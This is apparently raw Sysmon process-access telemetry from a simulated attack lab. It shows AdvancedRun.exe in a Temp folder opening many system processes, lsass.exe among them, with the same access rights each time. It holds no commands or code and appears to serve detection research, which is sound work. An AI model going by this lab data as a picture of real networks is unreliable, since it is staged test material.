19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.229{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004057071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004057070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.228{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.227{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 